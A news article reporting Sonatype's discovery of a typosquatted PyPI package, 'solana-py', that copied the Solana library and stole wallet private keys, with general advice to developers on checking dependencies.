Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that was disguised as a legitimate Solana blockchain library. Instead of performing its claimed function, the package was designed to steal private keys from users’ cryptocurrency wallets.
The actual Solana Python API project on GitHub is called “solana-py”, but it is named “solana” on PyPI. A threat actor took advantage of this small difference and uploaded a malicious package called ‘solana-py’ to the PyPI repository with the intention of passing it off as the genuine Solana package.
The actual “solana-py” malicious package was downloaded 1,122 times before it was pulled from PyPI. They were released in versions 0.34.3, 0.34.4, and 0.34.5 which is very similar to the latest official ‘solana’ package 0.34.3. This close versioning was a strategy to mislead users searching for the right package to install.
This fake package included the majority of the authentic code from the Solana library but had one fatal change. An attacker planted an exploit in a specific file known as “__init__.py,” whose purpose was to draw Solana blockchain wallet keys from anybody who used the package.
The stolen information was then forwarded to a domain on Hugging Face Spaces called “treeprime-gen.hf[.]space” owned by the attacker. This is a common trend in which cybercriminals employ normal networks to commit their criminal activities as in this case of data theft.
Sonatype Warns of Dangerous PyPI Library Risks
This example reveals critical vulnerabilities in the software supply chain. Sonatype, the cybersecurity firm that discovered the danger, noted that legitimate libraries such as “solders” mentioned “solana-py” in the PyPI project description. This could have made developers download the package without their knowledge.
From Sonatype, Ax Sharma reported that anyone who uses the real ‘solders’ package on PyPI may accidentally install the typosquatting ‘solana-py’ and introduce a crypto stealer into their application. This does not only endanger the developer’s secrets but also the data of any user running the compromised software.
Ultimately, this event reveals that one has to be very careful when downloading software packages. Developers must always ensure that the libraries they use are authentic. In addition to this, they must also conduct security checks from time to time to identify possible threats. It prevents similar attacks in the future by being aware of the newly emerging cybersecurity threats and avoiding dependency on third-party packages.